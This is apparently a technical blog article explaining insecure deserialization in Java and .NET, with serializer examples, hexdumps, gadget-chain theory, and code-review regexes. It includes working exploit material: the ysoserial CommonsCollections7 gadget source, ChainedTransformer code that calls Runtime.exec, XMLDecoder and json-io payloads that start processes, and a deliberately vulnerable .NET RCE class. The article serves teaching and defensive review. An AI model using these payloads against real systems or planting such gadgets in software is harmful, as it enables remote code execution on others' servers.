Serialization: the big threat

One of the emerging security issues affecting Object Oriented Programming (OOP) Languages over the last few years was “Insecure Deserialization”. A wide range of literature is already available on this topic, however, the main objective of this document is to provide a brief and precise explanation of this vulnerability, as well as common exploitation and detection methods. Moreover, we will see how this method can be applied to different programming languages.

Serialization: What is it?
Deserialization: What do I need to know?
1. JAVA
  - Binary serialization archive
  - Generate payloads dinamically: ysoserial
  - Text-based serialization archive
    - XML
    - JSON
  - Generate payloads dinamically: marshalsec
  - Tips for source code reviewers
2. .NET
  - Binary serialization archive
  - Generate payloads dinamically: ysoserial.net
  - Text-based serialization archive
    - XML
    - JSON
  - Tips for source code reviewers
3. PHP
  - Native serialization archive
    - Differences from JAVA and .NET
    - How to search for valid gadgets
    - PHAR Driven Deserialization
  - Generate payloads dinamically: PHPGGC
  - Tips for source code reviewers
4. Python
  - Binary serialization archive
  - Text-based serialization archive
    - YAML
    - JSON
  - Generate payloads dinamically: deser-py
  - Tips for source code reviewers
5. NodeJS
  - Text-based serialization archive
  - Generate payloads dinamically: deser-node
6. Ruby
  - Binary serialization archive
  - Text-based serialization archive
    - YAML
  - Generate payloads dinamically: deser-ruby
  - Tips for source code reviewers
References

Serialization: What is it?

Object serialization, also known as “marshalling”, is the process of converting an object-state, in the form of an arbitrarily complicated data structure, in a way that can be easily sent in message, stored in a database, or saved in a text file (this is commonly achieved with a serialized string). The serialized object-state could then be reconstructed using the opposite process, called deserialization, or “unmarshalling”, which produce an object that is “semantically” identical to the original.

Serialization

By looking solely at the definition, this seems to be an easy process; in reality it is quite the opposite. Serialization is a low-level technique that violates encapsulation and breaks the opacity of an abstract data type. In many programming languages serialization is natively supported (usually within core libraries) and, as such, no additional code development is required.

The languages that support serialisation and that are of interest for this document are:

Java
.NET
PHP
Python
NodeJS
Ruby

At the time of writing, no other language has been found to be affected by this issue.

The result of the serialization process is called “archive”, or sometimes archive medium. Serialization archive formats fall into three main categories:

Text-based - as a stream of text characters. Typical examples of text-based formats include raw text format, JavaScript Object Notation (JSON) and Extensible Markup Language (XML).
Binary - as a stream of bytes. Binary formats are more implementation-dependent and are not so standardized.
“Hybrid” or native, like PHP serialization, Python pickle and others. Hybrid format is usually in the middle between the two previous formats, and can be totally or partially human readable.

Following, a few examples of serialization (JAVA):

Serialization Example

Deserialization: What I need to know?

The first things to know about deserialization is that it does not make source-code vulnerable by just using it. As in many other examples found in code development, applications can be implemented securely. This concept led to the definition of “Insecure Deserialization”, and it is actually a combination of factors which altogether allow the exploitation of the deserialization process.

The main idea behind insecure deserialization is that, under certain conditions, a user can force the application to load an arbitrary class object during the unmarshalling process. Depending on the content of the forced class, different outputs can be achieved: Denial-of-Service (DoS) and Remote Code Execution (RCE) are among the most interesting ones.

But what are these conditions? The conditions needed to exploit the deserialization process may vary depending on language and platform involved.

It is important to define at this point is the concept of POP Gadget. Informally, a gadget is a piece of code (i.e property or method), implemented by an application’s class, that can be called during the deserialization process. These gadgets can be further combined/chained to call additional classes, or execute other code. Informally, a set of gadget may be more than enough to call an arbitrary function provided by the language, in which case, it is possible for an attacker to achieve RCE on the target application, using a POP chain.

If the reader is familiar with advanced binary exploitation, the concept is very similar to ROP gadgets, while POP (Property Oriented Programming) is used instead of ROP (Return Oriented Programming).

To give a more precise definition, POP gadgets are classes or piece of classes with the following characteristics:

Can be serialized
Has public/accessible properties (class variables, we’ll see later on)
Implements specific vulnerable methods [Language dependent]
[Visibility constraint] Has access to other “callable” classes

Note: The term “visibility constraint”, is referring to capability of a POP gadget to be accessed by the application during the deserialization process. If the application had no visibility over the class used for the exploitation (module not loaded, version mismatch, sandboxing, altered standard library, etc.), the POP chain would fail to execute.

Before proceeding further, it is necessary to define the generic structure of a deserialization exploit:

Find an application endpoint that deserializes user controllable data
Find a Gadget for exploitation
Develop a serializer to build the payload (Ready-to-use tools are available)
Use the payload against the endpoint

Notes about code samples:

All the samples of this document were tested on a Windows box.
All the code of this document can be found in the main GitHub repository, here.

Java

The following chapter will focus on JAVA based deserialization issues, and will be divided by serialized archive format.

Java: Binary Archive Format

In JAVA, objects can be serialiazed only if their class implements the java.io.Serializable interface. The most common method used to serialize objects is using ByteStreams. A simple example is provided below:

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

public class Desert implements Serializable{

    private static final long serialVersionUID = 1L;
    public String name;
    public int width;
    public int height;

    public Desert(String name, int i, int j) {
        // Constructor
        this.name = name;
        this.width = i;
        this.height = j;
    }

    public static void Deserialize() {
        try{
            //Creating an input stream to reconstruct the object from serialised data
            ObjectInputStream in=new ObjectInputStream(new FileInputStream("de.ser"));
            Desert desert=(Desert)in.readObject();
            // Showing the data of the serialised object
            System.out.println("The desert: " + desert.name);
            System.out.println("Has a surface of: " + String.valueOf(desert.width*desert.height) );
            // Closing the stream
            in.close();
            }catch(Exception e){
                System.out.println(e);
                }
            }

    public static void Serialize() {
        try {
            // Creating the object
            Desert desert = new Desert("Mobi", 2000, 1500);
            // Creating output stream and writing the serialised object
            FileOutputStream outfile = new FileOutputStream("de.ser");
            ObjectOutputStream outstream = new ObjectOutputStream(outfile);
            outstream.writeObject(desert);
            outstream.flush();
            // closing the stream
            outstream.close();
            System.out.println("Serialized data saved to de.ser");
        } catch (Exception e) {
            System.out.println(e);
        }
    }
    
    public static void main(String args[]) {
        boolean serialize = true;
        
        if (serialize) {
            Desert.Serialize();
        } else {
            Desert.Deserialize();
        }
    }
}

Once executed, it would give us the following file:

$ hexdump.exe -C de.ser
00000000  ac ed 00 05 73 72 00 06  44 65 73 65 72 74 31 91  |....sr..Desert1.|
00000010  71 33 04 c2 c7 18 02 00  03 49 00 06 68 65 69 67  |q3.......I..heig|
00000020  68 74 49 00 05 77 69 64  74 68 4c 00 04 6e 61 6d  |htI..widthL..nam|
00000030  65 74 00 12 4c 6a 61 76  61 2f 6c 61 6e 67 2f 53  |et..Ljava/lang/S|
00000040  74 72 69 6e 67 3b 78 70  00 00 05 dc 00 00 07 d0  |tring;xp........|
00000050  74 00 04 4d 6f 62 69                              |t..Mobi|
00000057

The starting bytes, ac ed 00 05 are a known signature for JAVA serialized objects. It should be noticed that the Deserialize function, calls one of the potentially exploitable function of JAVA, readObject(). During the deserialization process (via the readObject() function), the serialized-object properties are accessed recursively, untill every properties have been read. This process is due to the nature of serialization, as an exact clone of the original object is the result of this process, each and every property must be read and re-instantiated.

How can this process be exploited? Basically, by passing an arbitrary nested object to the readObject() function, forcing the application to instantiate a chain of POP gadgets that will lead to an RCE. The POP gadgets that can be used may vary depending on the application CLASSPATH (as any gadget function must be on the classpath in order to be instantiated [Visibility Constraint]). The POP chain uses an opaque class order in order to chain subsequent classes using reflection, which allows to dynamically load classes and methods even without prior knowledge of these classes and methods. A common pattern used to create chains is the DynamicProxy pattern, which more details can be found here.

Following, a very basic example of DynamicProxy implementation:

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;
import java.util.Map;

public class DynamicProxy implements InvocationHandler {
          
    @Override
    public Object invoke(Object proxy, Method method, Object[] args) 
      throws Throwable {
        System.out.println("Invoked method: " + method.getName());
        return method.getName();
    }

    public static void main(String args[]) {
        Map proxyInstance = (Map) Proxy.newProxyInstance(
        DynamicProxy.class.getClassLoader(), 
        new Class[] { Map.class }, 
        new DynamicProxy());
        
        System.out.println(proxyInstance.toString());
    }   
}

The above, would produce the following output:

Invoked method: toString
toString

Showing that any code contained in the invoke function gets executed when a method of the proxy is called. Using this approach, it is possible to force the execution of arbitrary code whenever a specific method is invoked.

It should be noted that the use of map, is arbitrary, whatever object class could be used on its place.

Another useful pattern (technically more a class than a pattern), which is crucial to understand how it is possible to trigger remote code execution during deserialization, is the ChainedTransformer class.

A transformer, in JAVA, is a class which takes an object and returns a new object instance. A chained transformer, for instance, can chain multiple transformer togheter to transform an object multiple times, in sequence. To understand how this can be used to reach RCE, the following code may be taken as example:

import java.io.IOException;
import java.lang.reflect.InvocationTargetException;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;

public class ExeCmdInvokerTransformer {
    
    public static void main(String args[]) {
        
        final String[] execArgs = new String[]{"cmd /c calc"};
        
        // Chain to transform object in -> ((Runtime)Runtime.class.getMethod("getRuntime").invoke(Object.class, null)).exec("cmd /c calc");
        Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",
                new Class[]{String.class, Class[].class},
                new Object[]{"getRuntime", new Class[0]}),
            new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, new Object[0]}),
            new InvokerTransformer("exec",
                new Class[]{String.class}, 
                execArgs
                 ),
            new ConstantTransformer(1)};
        
        Transformer transformerChain = new ChainedTransformer(transformers);
        
        // Testing the transformer
        Object object = new Object();
        transformerChain.transform(object);
    }
}

Above, the chain transformer takes an arbitrary object, ignores it, calls runtime exec, and executes an arbitrary command (in this case cmd /c calc).

The last “pattern” that is important to see is the “key creation via LazyMap key search miss”. A LazyMap, in JAVA, is a decorator (function that can be applied to an object, a Map in this case) that gets executed whenever a key is requested in a Map, invoking a transformer. The terms “lazy”, refers to the fact that a map decorated with a LazyMap decorator isn’t filled by (key, value) pairs from the start, but it gets populated once the first call to a map key forces the transformer to execute, fetching the correct value for the requested key. The following example may help to understand how the proces works:

import java.util.*;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.map.LazyMap;

public class HowLazyMap {
    
    public static void main(String args[]) {
    // Create a Transformer to get random areas
        Transformer randomArea = new Transformer( ) {
            public Object transform( Object object ) {
                String name = (String) object;
                Random random = new Random();
                return random.nextDouble();
            }
        };

        // Create a LazyMap called desertAreasLazy, which uses the above Transformer
        Map deserts = new HashMap( );
        Map desertAreasLazy = LazyMap.decorate( deserts, randomArea );
        
        // Set name to fetch
        String desertName = "Gobi";
        
        System.out.println(String.format("Deserts contains %s? Result: %s", desertName, deserts.get(desertName)));  
        
        // Get name, print area
        String area = (String) String.valueOf(desertAreasLazy.get( desertName ));
        System.out.println( "Area: " + area );

        System.out.println(String.format("Deserts now contains %s? Result: %s", desertName, deserts.get(desertName)));
    }
}

The result would be something like:

Deserts contains Gobi? Result: null
Area: 0.8610944732469801
Deserts now contains Gobi? Result: 0.8610944732469801

Showing that the LazyMap populates the HashMap with a “lazy” approach.

How can the above be chained to exploit the deserialization process?

Informally, a gadget chain could be built to create a LazyMap, set a Dynamic Proxy to hook a key creation, and execute a chained transformer on the hook. A more detailed example, using CommonsCollection, is provided further on.

Generate payloads dynamically: Ysoserial

During the years, a set of common libraries were identified that can be used to build POP chains. These libraries are known as gadget libraries.

These common libraries can be automatically used to generate exploit payloads, using a very powerful tool named ysoserial, available here.

The available payloads are listed below:

     Payload             Authors                                Dependencies
     -------             -------                                ------------
     BeanShell1          @pwntester, @cschneider4711            bsh:2.0b5
     C3P0                @mbechler                              c3p0:0.9.5.2, mchange-commons-java:0.2.11
     Clojure             @JackOfMostTrades                      clojure:1.8.0
     CommonsBeanutils1   @frohoff                               commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
     CommonsCollections1 @frohoff                               commons-collections:3.1
     CommonsCollections2 @frohoff                               commons-collections4:4.0
     CommonsCollections3 @frohoff                               commons-collections:3.1
     CommonsCollections4 @frohoff                               commons-collections4:4.0
     CommonsCollections5 @matthias_kaiser, @jasinner            commons-collections:3.1
     CommonsCollections6 @matthias_kaiser                       commons-collections:3.1
     CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
     FileUpload1         @mbechler                              commons-fileupload:1.3.1, commons-io:2.4
     Groovy1             @frohoff                               groovy:2.3.9
     Hibernate1          @mbechler
     Hibernate2          @mbechler
     JBossInterceptors1  @matthias_kaiser                       javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     JRMPClient          @mbechler
     JRMPListener        @mbechler
     JSON1               @mbechler                              json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
     JavassistWeld1      @matthias_kaiser                       javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     Jdk7u21             @frohoff
     Jython1             @pwntester, @cschneider4711            jython-standalone:2.5.2
     MozillaRhino1       @matthias_kaiser                       js:1.7R2
     MozillaRhino2       @_tint0                                js:1.7R2
     Myfaces1            @mbechler
     Myfaces2            @mbechler
     ROME                @mbechler                              rome:1.0
     Spring1             @frohoff                               spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
     Spring2             @mbechler                              spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
     URLDNS              @gebl
     Vaadin1             @kai_ullrich                           vaadin-server:7.7.14, vaadin-shared:7.7.14
     Wicket1             @jacob-baines                          wicket-util:6.23.0, slf4j-api:1.6.4

Taking the deserialization example provided above, the reader may try to craft a payload using ysoserial and CommonsCollections7:

$ ysoserial CommonsCollections7 "cmd /c calc.exe" > ./Serialize/de.ser

However, if used against the example, the payload won’t work, showing a java.lang.ClassNotFoundException: org.apache.commons.collections.map.LazyMap exception. The reason being the “visibility constraint”. The payload CommonsCollection7 uses CommonsCollections:3.1, which is not part of the standard JAVA SDK, which means the POP gadgets to build the required chain cannot be found. In order to make it work, the reader should ensure to add this dependency to the application classpath. A working example, where the org.apache.commons-collections:3.1 dependency has been added, can be found here.

Payloads generated with ysoserial share a common structure, which use a Payload Runner using maps to setup the conditions, and a transformer to actually build and run OS commands.

Following the implementation of CommonsCollections7:

public class CommonsCollections7 extends PayloadRunner implements ObjectPayload<Hashtable> {

    public Hashtable getObject(final String command) throws Exception {

        // Reusing transformer chain and LazyMap gadgets from previous payloads
        final String[] execArgs = new String[]{command};

        final Transformer transformerChain = new ChainedTransformer(new Transformer[]{});

        final Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",
                new Class[]{String.class, Class[].class},
                new Object[]{"getRuntime", new Class[0]}),
            new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, new Object[0]}),
            new InvokerTransformer("exec",
                new Class[]{String.class},
                execArgs),
            new ConstantTransformer(1)};

        Map innerMap1 = new HashMap();
        Map innerMap2 = new HashMap();

        // Creating two LazyMaps with colliding hashes, in order to force element comparison during readObject
        Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain);
        lazyMap1.put("yy", 1);

        Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain);
        lazyMap2.put("zZ", 1);

        // Use the colliding Maps as keys in Hashtable
        Hashtable hashtable = new Hashtable();
        hashtable.put(lazyMap1, 1);
        hashtable.put(lazyMap2, 2);

        Reflections.setFieldValue(transformerChain, "iTransformers", transformers);

        // Needed to ensure hash collision after previous manipulations
        lazyMap2.remove("yy");

        return hashtable;
    }

    public static void main(final String[] args) throws Exception {
        PayloadRunner.run(CommonsCollections7.class, args);
    }
}

Dissecting the above code:

Using readObject(), the JVM looks for the serialized Object’s class in the ClassPath.
- Class not found -> throws exception(ClassNotFoundException)
- Class found -> java.util.Hashmap.reconsitutionPut is called
The code forced a hash collision, so a comparison is issued using equals
The decorator forwards the method to the AbstractMap -> lazyMap
The lazyMap attempts to retrieve a value with a key equal to the “map”
Since that key does not exist, the lazyMap instance goes ahead and tries to create a new key
Since a chainedTransformer is set to execute during the key creation process, the chained transformer with the malicious payload is invoked, leading to remote code execution.

Java: Text-based Archive Format

Of course, this issue doesn’t affect just the binary archive format, but can be extended to text-based serialization archives. The two formats that are of interest for this document are XML and JSON.

XML

XML Serialization/Deserialization is offered, among others, by the XMLEncoder/XMLDecoder and XStream classes. These classes are known to be susceptible to deserialization issues leading to RCE.

Let’s consider the following example:

import java.beans.XMLDecoder;
import java.io.BufferedInputStream;
import java.io.FileInputStream;
 
public class DesertXML {
     
    public static void main(String[] args) throws Exception {
         
        XMLDecoder decoder = new XMLDecoder(new BufferedInputStream(new FileInputStream("desert.xml")));
 
        // Deserialise object from XML
        Object desert = decoder.readObject();
        decoder.close();
         
        System.out.println("The desert: " + ((Desert)desert).getName());
        System.out.println("Has a surface of: " + String.valueOf(((Desert)desert).getWidth()*((Desert)desert).getHeight()) );
 
    }
     
    public static class  Desert {
         
        private String name;
        private int width;
        private int height;

        /**
         * Getters and Setters
         */
        public String getName() {
            return name;
        }
        public void setName(String name) {
            this.name = name;
        }
        public int getWidth() {
            return width;
        }
        public void setWidth(int width) {
            this.width = width;
        }
        public int getHeight() {
            return height;
        }
        public void setHeight(int height) {
            this.height = height;
        }    
    }
}

The application tries to instantiate a Desert object by loading it from an external XML file. Instead of an XML parser, the readObject() is called from the XMLDecoder class.

As for the previous example, it is possible to force the application into loading arbitrary classes, in the most suitable way to execute arbitrary code. In this case, it would be possible to load classes used by JAVA to interact with the OS, such as java.lang.Runtime or java.lang.ProcessBuilder. By using these classes, the application would kindly start new processes, executing arbitrary code. An example payload is provided below:

<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_241" class="java.beans.XMLDecoder">
 <void class="java.lang.ProcessBuilder">
   <array class="java.lang.String" length="3">
          <void index="0">
              <string>cmd</string>
          </void>
          <void index="1">
              <string>/c</string>
          </void>
          <void index="2">
              <string>calc</string>
          </void>
      </array>
    <void method="start" id="process">
    </void>
  </void>
</java>

JSON

Of course, JSON format is not free from this kind of vulnerability. The main problem with JSON, however, is that different libraries exist in JAVA which supports automatic serialization/deserialization, and not all of them are equally subsceptible to this kind of attack. The library chosen as subject of the following example is JsonIO (json-io).

The following code would serve as a proof-of-concept of a vulnerable JSON deserializer:

public class DesertJSON {
     
    public static void main(String[] args) throws Exception {

        // Read JSON as a string
        String json = new String(Files.readAllBytes(Paths.get("desert.json")));
        // Deserialising        
        Object desert = JsonReader.jsonToJava(json);

        System.out.println("The desert: " + ((Desert)desert).getName());
        System.out.println("Has a surface of: " + String.valueOf(((Desert)desert).getWidth()*((Desert)desert).getHeight()) );
    }
     
    public static class  Desert {
         
        private String name;
        private int width;
        private int height;
        
        /**
         * Getters and Setters
         */
        public String getName() {
            return name;
        }
        public void setName(String name) {
            this.name = name;
        }
        public int getWidth() {
            return width;
        }
        public void setWidth(int width) {
            this.width = width;
        }
        public int getHeight() {
            return height;
        }
        public void setHeight(int height) {
            this.height = height;
        }    
    }
}

The main weakness of JsonIO (json-io) is that it allows to specify the type of the object to be deserialized within the JSON body, using the @type key. If the type is not validated, it is possible to force the application to load an arbitrary class. The concept used for exploitation is the same as the other type of deserialization issues, the only thing needed is to find a POP chain to achieve RCE.

Generate payloads dinamically: marshalsec

In this research, M. Becheler, enumerates various JSON libraries and each method used for RCE exploitation. As part of the research, he provided an interesting tool, to automatically generates payloads for these libraries. For example, considering the vulnerable deserializaer, it is possible to generate the following payload:

$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.JsonIO Groovy "cmd" "/c" "calc"

{"@type":"java.util.Arrays$ArrayList","@items":[{"@id":2,"@type":"groovy.util.Expando","expandoProperties":{"@type":"java.util.HashMap","hashCode":{"@type":"org.codehaus.groovy.runtime.MethodClosure","method":"start","delegate":{"@id":1,"@type":"java.lang.ProcessBuilder","command":{"@type":"java.util.ArrayList","@items":["cmd","/c","calc"]},"directory":null,"environment":null,"redirectErrorStream":false,"redirects":null},"owner":{"@ref":1},"thisObject":null,"resolveStrategy":0,"directive":0,"parameterTypes":[],"maximumNumberOfParameters":0,"bcw":null}}},{"@type":"java.util.HashMap","@keys":[{"@ref":2},{"@ref":2}],"@items":[{"@ref":2},{"@ref":2}]}]}

If opened with the vulnerable deserializer, a calculator will spawn on the hosting machine.

Tips for Source Code reviewers

To find this kind of vulnerability it is usually enough to search the code for common regexes, like:

.*readObject\(.*
java.beans.XMLDecoder
com.thoughtworks.xstream.XStream
.*\.fromXML$.*$
com.esotericsoftware.kryo.io.Input
.readClassAndObject\(.*
.readObjectOrNull\(.*
com.caucho.hessian.io
com.caucho.burlap.io.BurlapInput
com.caucho.burlap.io.BurlapOutput
org.codehaus.castor
Unmarshaller
jsonToJava\(.*
JsonObjectsToJava\/.*
JsonReader
ObjectMapper\(
enableDefaultTyping$\s*$
@JsonTypeInfo\(
readValue\(.*\,\s*Object\.class
com.alibaba.fastjson.JSON
JSON.parseObject
com.owlike.genson.Genson
useRuntimeType
genson.deserialize
org.red5.io
deserialize\(.*\,\s*Object\.class
\.Yaml
\.load\(.*
\.loadType\(.*\,\s*Object\.class
YamlReader
com.esotericsoftware.yamlbeans

For each match, the code should be manually inspected to see whether the object being deserialized can be manipulated by an external attacker.

Additional Affected Libraries

As previously said, through the years, many other libraries had been found to be affected by this vulnerability. While exploring all of them is outside the bounds of this article, following a list of additional resource, which can be used by the hungry reader to further explore this fascinating issue:

For additional references and a safe playground to exercise with this kind of vulnerabilities, a dear friend and colleague Nicky Bloor developed a fantastic vulnerable Lab, called DeserLab.

If that was not enough, he released a set of fantastic tools to aid with Java deserialization identification and exploitation:

Nicky is an expert code reviewer and one of the major experts about JAVA deserialization issues, you can find out more about his work here.

.NET

.NET, as JAVA, has developed over the years different mechanism to support object serialization. As Java, the primary archive formats are:

Binary
XML
JSON

.NET: Binary Archive Format

In .NET, Binary serialization is mainly provided by System.Runtime.Serialization.Binary.BinaryFormatter. This class can virtually serialize ANY type which is marked as [Serializable] or which directly implements the ISerializable interface (allowing custom serialization).

The following C# code can be used to serialize/deserialize the class Desert (similarly to the JAVA examples):

using System;
using System.IO;
using System.Runtime.Serialization;
using
System.Runtime.Serialization.Formatters.Binary;
namespace BinarySerialization
{
    public static class BinarySerialization
    {
        private const string filename = "desert.ser";
        [STAThread]
        static void Main(string[] args)
        {
            Console.WriteLine();

            bool deserialize = false;
            if (deserialize)
            {
                BinarySerialization.desertDeserial(filename);
            }
            else
            {
                // Delete old file, if it exists
                BinarySerialization.deleteFile(filename);
                BinarySerialization.desertSerial(filename);
            }
            Console.WriteLine();
            Console.WriteLine("Press Enter Key");
            Console.Read();
        }

        public static void deleteFile(string filname)
        {
            if (File.Exists(filename))
            {
                Console.WriteLine("Deleting old file");
                File.Delete(filename);
            }
        }

        public static void desertDeserial(string filename)
        {
            var formatter = new BinaryFormatter();
            // Open stream for reading
            FileStream stream = File.OpenRead(filename);
            Console.WriteLine("Deserializing string");
            // Deserializing
            var desert = (Desert)formatter.Deserialize(stream);
            stream.Close();
        }

        public static void desertSerial(string filename)
        {
            // Create desert name
            var desert = new Desert();
            desert.name = "Gobi";
            // Persist to file
            FileStream stream = File.Create(filename);
            var formatter = new BinaryFormatter();
            Console.WriteLine("Serializing desert");
            formatter.Serialize(stream, desert);
            stream.Close();
        }
    }

    [Serializable]
    public class RCE : IDeserializationCallback
    {
        private String _cmd;
        public String cmd
        {
            get { return _cmd; }
            set
            {
                _cmd = value;
                run();
            }
        }

        private void run()
        {
            System.Diagnostics.Process p = new System.Diagnostics.Process();
            p.StartInfo.FileName = _cmd;
            p.Start();
            p.Dispose();
        }

        public void OnDeserialization(object sender) {
            Run();
        }
    }

    [Serializable]
    public class Desert
    {
        private String _name;

        public String name
        {
            get { return _name; }
            set { _name = value; Console.WriteLine("Desert name: " + _name); }
        }
    }
}

Running the serializer, the following object would be created:

$ hexdump.exe -C desert.ser
00000000  00 01 00 00 00 ff ff ff  ff 01 00 00 00 00 00 00  |................|
00000010  00 0c 02 00 00 00 49 42  61 73 69 63 58 4d 4c 53  |......IBasicXMLS|
00000020  65 72 69 61 6c 69 7a 65  72 2c 20 56 65 72 73 69  |erializer, Versi|
00000030  6f 6e 3d 31 2e 30 2e 30  2e 30 2c 20 43 75 6c 74  |on=1.0.0.0, Cult|
00000040  75 72 65 3d 6e 65 75 74  72 61 6c 2c 20 50 75 62  |ure=neutral, Pub|
00000050  6c 69 63 4b 65 79 54 6f  6b 65 6e 3d 6e 75 6c 6c  |licKeyToken=null|
00000060  05 01 00 00 00 1a 42 69  6e 61 72 79 53 65 72 69  |......BinarySeri|
00000070  61 6c 69 7a 61 74 69 6f  6e 2e 44 65 73 65 72 74  |alization.Desert|
00000080  01 00 00 00 05 5f 6e 61  6d 65 01 02 00 00 00 06  |....._name......|
00000090  03 00 00 00 04 47 6f 62  69 0b                    |.....Gobi.|
0000009a

The first 17 bytes are the header of the serialized object, which consists of:

RecordTypeEnum (1 byte)
RootId (4 bytes)
HeaderId (4 bytes)
MajorVersion (4 bytes)
MinorVersion (4 bytes)

How can it be exploited?

The approach is very similar to the one applied to JAVA, and consists to trick the application into loading an arbitrary object, that could allow to gain code execution capabilities. In order to do it, a suitable class or chain of classes must be found, which should have at least the following properties (NW: not a formal definition):

Serializable
Holding public/settable variables
Implementing magic “functions” (we’ll see an example below), like:
- Get/Set
- OnSerialisation
- Constructors/Destructors

Taking a deeper look at the code above, it is possible to see this class:

 [Serializable]
public class RCE : IDeserializationCallback
{
    private String _cmd;
    public String cmd
    {
        get { return _cmd; }
        set
        {
            _cmd = value;
            Run();
        }
    }

    public void Run()
    {
        System.Diagnostics.Process p = new System.Diagnostics.Process();
        p.StartInfo.FileName = _cmd;
        p.Start();
        p.Dispose();
    }

    public void OnDeserialization(object sender) {
        Run();
    }
}

This class seems to fulfill the requirements for a Gadget, and could be even used alone to execute arbitrary code. In order to achieve it, it would be enough to serialize the RCE class giving a valid command to execute:

using System;
using System.IO;
using System.Runtime.Serialization;
using
System.Runtime.Serialization.Formatters.Binary;
namespace BinarySerialization
{
    public static class BinarySerialization
    {
        private const string filename = "desert.ser";
        [STAThread]
        static void Main(string[] args)
        {
            Console.WriteLine();
            // Delete old file, if it exists
            BinarySerialization.deleteFile(filename);
            // Serialize RCE
            BinarySerialization.desertSerial(filename);
            // Wait for Enter
            Console.WriteLine();
            Console.WriteLine("Press Enter Key");
            Console.Read();
        }

        public static void deleteFile(string filname)
        {
            if (File.Exists(filename))
            {
                Console.WriteLine("Deleting old file");
                File.Delete(filename);
            }
        }     

        public static void desertSerial(string filename)
        {
            // Create desert name
            var desert = new RCE();
            desert.cmd = "calc.exe";
            // Persist to file
            FileStream stream = File.Create(filename);
            var formatter = new BinaryFormatter();
            Console.WriteLine("Serializing desert (RCE)");
            formatter.Serialize(stream, desert);
            stream.Close();
        }

    }

    [Serializable]
    public class RCE : IDeserializationCallback
    {
        private String _cmd;
        public String cmd
        {
            get { return _cmd; }
            set
            {
                _cmd = value;
                //run(); Disabled to avoid spawning a calc while serializing 
            }
        }

        private void run()
        {
            System.Diagnostics.Process p = new System.Diagnostics.Process();
            p.StartInfo.FileName = _cmd;
            p.Start();
            p.Dispose();
        }

        public void OnDeserialization(object sender) {
            Run();
        }
    }
}

Serializing that would produce the following file:

$ hexdump.exe -C desert.ser
00000000  00 01 00 00 00 ff ff ff  ff 01 00 00 00 00 00 00  |................|
00000010  00 0c 02 00 00 00 47 42  69 6e 61 72 79 53 65 72  |......GBinarySer|
00000020  69 6c 69 61 7a 65 72 2c  20 56 65 72 73 69 6f 6e  |iliazer, Version|
00000030  3d 30 2e 30 2e 30 2e 30  2c 20 43 75 6c 74 75 72  |=0.0.0.0, Cultur|
00000040  65 3d 6e 65 75 74 72 61  6c 2c 20 50 75 62 6c 69  |e=neutral, Publi|
00000050  63 4b 65 79 54 6f 6b 65  6e 3d 6e 75 6c 6c 05 01  |cKeyToken=null..|
00000060  00 00 00 17 42 69 6e 61  72 79 53 65 72 69 61 6c  |....BinarySerial|
00000070  69 7a 61 74 69 6f 6e 2e  52 43 45 01 00 00 00 04  |ization.RCE.....|
00000080  5f 63 6d 64 01 02 00 00  00 06 03 00 00 00 08 63  |_cmd...........c|
00000090  61 6c 63 2e 65 78 65 0b                           |alc.exe.|
00000098

Once deserialized by the application, it would automatically spawn a calculator on the application hosting server.

The next question would be, could it be possible to exploit it without relying on the “Damn Vulnerable” RCE class? The answer is yes, and it can be done, similarly to JAVA, by means of POP gadgets.

The only exception being that each formatter holds its own exploitation methodology and its gadgets. Informally, in .NET each formatter has visibility only to certain objects types, so not every gadget can be used with a specific formatter (We’ll see a manual example of that later on in this document).

Generate payloads dinamically: ysoserial.net

During the years, ysoserial.net was created, which allows to generate automatically serialized payloads using known .NET gadgets. The tool is available here

ysoserial.net generates deserialization payloads for a variety of .NET formatters.

Available formatters:
        ActivitySurrogateDisableTypeCheck (ActivitySurrogateDisableTypeCheck Gadget by Nick Landers. Disables 4.8+ type protections for ActivitySurrogateSelector, command is ignored.)
                Formatters:
                        BinaryFormatter
                        ObjectStateFormatter
                        SoapFormatter
                        NetDataContractSerializer
                        LosFormatter
        ActivitySurrogateSelectorFromFile (ActivitySurrogateSelector gadget by James Forshaw. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'.)
                Formatters:
                        BinaryFormatter
                        ObjectStateFormatter
                        SoapFormatter
                        LosFormatter
        ActivitySurrogateSelector (ActivitySurrogateSelector gadget by James Forshaw. This gadget ignores the command parameter and executes the constructor of ExploitClass class.)
                Formatters:
                        BinaryFormatter
                        ObjectStateFormatter
                        SoapFormatter
                        LosFormatter
        ObjectDataProvider (ObjectDataProvider Gadget by Oleksandr Mirosh and Alvaro Munoz)
                Formatters:
                        Xaml
                        Json.Net
